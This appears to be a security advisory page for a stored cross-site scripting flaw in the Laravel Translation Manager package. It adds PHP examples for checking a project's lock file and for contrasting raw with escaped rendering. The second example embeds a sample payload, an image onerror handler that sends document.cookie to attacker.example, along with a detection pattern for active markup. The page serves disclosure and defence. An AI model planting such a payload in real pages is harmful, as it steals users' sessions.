
CVE-2025-49130 barryvdh/laravel-translation-manager

Package

Manager: composer
Name: barryvdh/laravel-translation-manager
Vulnerable Version: >=0 <0.6.8 (every release before 0.6.8)
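A practical first check is whether a project's lock file pins an affected release. The script below is an added example written for this page, not part of the advisory or of the package; it reads composer.lock (here a constructed fragment embedded inline), finds the locked version of barryvdh/laravel-translation-manager in either the production or dev section, and compares it against the fixed release 0.6.8. The leading "v" that Composer records from Git tags is stripped before comparison, and non-tag versions such as dev-master are reported as unknown rather than silently treated as safe.

```php
<?php
// Added check for this advisory page; not code from the package or the advisory.
// Reads composer.lock contents and reports whether the locked
// barryvdh/laravel-translation-manager version is in the range >=0 <0.6.8.

declare(strict_types=1);

const VULN_PACKAGE = 'barryvdh/laravel-translation-manager';
const FIXED_IN     = '0.6.8';

/** Return the locked version of $package from composer.lock JSON, or null if absent. */
function lockedVersion(string $lockJson, string $package): ?string
{
    $lock = json_decode($lockJson, true, 512, JSON_THROW_ON_ERROR);
    foreach (['packages', 'packages-dev'] as $section) {
        foreach ($lock[$section] ?? [] as $pkg) {
            if (strcasecmp($pkg['name'] ?? '', $package) === 0) {
                return (string) $pkg['version'];
            }
        }
    }
    return null;
}

/**
 * true  => below the fixed release (vulnerable)
 * false => fixed release or later
 * null  => not a tagged version (dev-*, branch alias); cannot compare
 * Composer stores tag names as written, so "v0.6.7" is normalised to "0.6.7"
 * before version_compare(); a bare "v" prefix would otherwise sort as lowest.
 */
function isVulnerable(string $version): ?bool
{
    $v = ltrim($version, 'vV');
    if (!preg_match('/^\d+(\.\d+)*/', $v)) {
        return null;
    }
    return version_compare($v, FIXED_IN, '<');
}

// Constructed composer.lock fragment used as sample input for the demo.
$sampleLock = json_encode([
    'packages' => [
        ['name' => 'barryvdh/laravel-translation-manager', 'version' => 'v0.6.7'],
        ['name' => 'laravel/framework', 'version' => 'v11.0.0'],
    ],
    'packages-dev' => [],
], JSON_THROW_ON_ERROR);

$version = lockedVersion($sampleLock, VULN_PACKAGE);
if ($version === null) {
    echo VULN_PACKAGE, " is not present in the lock file\n";
} else {
    $state = isVulnerable($version);
    $verdict = $state === null
        ? 'unknown (non-tagged version, check manually)'
        : ($state ? 'VULNERABLE, update to >=' . FIXED_IN : 'not affected');
    echo VULN_PACKAGE, ' ', $version, ': ', $verdict, "\n";
}
```

To run it against a real project, replace `$sampleLock` with `file_get_contents('composer.lock')`. Checking the lock file rather than composer.json matters because a constraint such as `^0.6` is satisfied by both affected and fixed releases; only the lock records what is actually installed.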

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N/E:H/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

EPSS: 0.00065 (percentile 0.20514)

Details

Laravel Translation Manager Vulnerable to Stored Cross-site Scripting

### Impact

The application is vulnerable to stored Cross-Site Scripting (XSS) because user-supplied translation data is neither validated nor sanitized correctly before it is rendered. An attacker who can submit such data can inject arbitrary HTML, including JavaScript, into a page that another user's browser then processes, allowing the attacker to steal sensitive data, hijack that user's session, or perform other actions on their behalf.

### Patches

The issue is fixed in https://github.com/barryvdh/laravel-translation-manager/pull/475, released in version 0.6.8.

### Workarounds

None listed. Only authenticated users with access to the translation manager are impacted.

### References

[PT-2025-04] laravel translation manager.pdf: https://github.com/user-attachments/files/20639250/PT-2025-04.laravel.translation.manager.pdf

### Reported by

Positive Technologies (Artem Deikov, Ilya Tsaturov, Daniil Satyaev, Roman Cheremnykh, Artem Danilov, Stanislav Gleym)
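The following is an added illustration of the CWE-79 pattern behind this advisory, not code taken from barryvdh/laravel-translation-manager or from the fix in PR #475. The advisory does not name the affected view, so the two renderers are hypothetical: one interpolates a stored translation value as raw HTML, the way Blade's `{!! $value !!}` does, and the other escapes on output with the same htmlspecialchars() call that Laravel's `e()` helper and `{{ $value }}` perform. The translation strings, including the payload, are constructed for the demo.

```php
<?php
// Added illustration for this advisory page; not the package's own views or fix.
// Assumption: a translation value stored by one authenticated user is rendered
// in the manager UI for other users. Which view does this in the real package
// is not stated in the advisory, so both renderers below are hypothetical.

declare(strict_types=1);

// Vulnerable pattern: the stored value is dropped into the markup unescaped,
// which is what Blade's {!! $value !!} produces.
function renderRaw(string $key, string $value): string
{
    return '<tr><td>' . $key . '</td><td>' . $value . '</td></tr>';
}

// Same escaping as Laravel's e() helper (Blade {{ $value }}): quotes are encoded
// so the value cannot break out of an attribute, and invalid UTF-8 is replaced
// rather than passed through.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: escape every untrusted string at the point of output.
function renderEscaped(string $key, string $value): string
{
    return '<tr><td>' . esc($key) . '</td><td>' . esc($value) . '</td></tr>';
}

// Reviewer check: does any stored value that carries active markup (a tag,
// an event handler or a javascript: URL) reach the rendered HTML verbatim?
function containsActiveMarkup(string $html, array $values): bool
{
    foreach ($values as $v) {
        $looksActive = preg_match('/<script|on\w+\s*=|javascript:/i', $v) === 1;
        if ($looksActive && str_contains($html, $v)) {
            return true;
        }
    }
    return false;
}

// Constructed sample input: one benign translation and one stored-XSS payload.
$translations = [
    'messages.welcome' => 'Welcome back',
    'messages.bye'     => '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
];

$rawHtml = $escapedHtml = '';
foreach ($translations as $key => $value) {
    $rawHtml     .= renderRaw($key, $value);
    $escapedHtml .= renderEscaped($key, $value);
}

echo "raw render leaks active markup:     ", containsActiveMarkup($rawHtml, $translations) ? 'yes' : 'no', "\n";
echo "escaped render leaks active markup: ", containsActiveMarkup($escapedHtml, $translations) ? 'yes' : 'no', "\n";
echo $escapedHtml, "\n";
```

The payload needs no `<script>` tag: an `onerror` handler on a broken image runs as soon as the row is drawn, which is why the CVSS vectors above score user interaction as none or passive. Escaping on output is the fix that generalises; input-side filtering of translation text is fragile because translators legitimately need characters such as `<`, `&` and quotes.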

Metadata

Created: 2025-06-09T13:15:19Z
Modified: 2025-06-09T15:55:56Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-j226-63j7-qrqh/GHSA-j226-63j7-qrqh.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-j226-63j7-qrqh
Finding: F425
Auto approve: 1